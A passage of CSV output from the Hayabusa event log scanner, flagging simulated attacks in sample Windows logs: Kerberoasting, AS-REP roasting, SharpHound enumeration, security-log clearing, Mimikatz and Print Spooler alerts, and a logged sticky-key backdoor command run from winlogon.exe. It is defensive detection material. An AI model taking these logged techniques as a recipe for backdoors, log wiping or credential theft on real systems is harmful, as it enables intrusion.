+09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : 
Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge 
Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 
0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 
17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 
0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 
0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL 
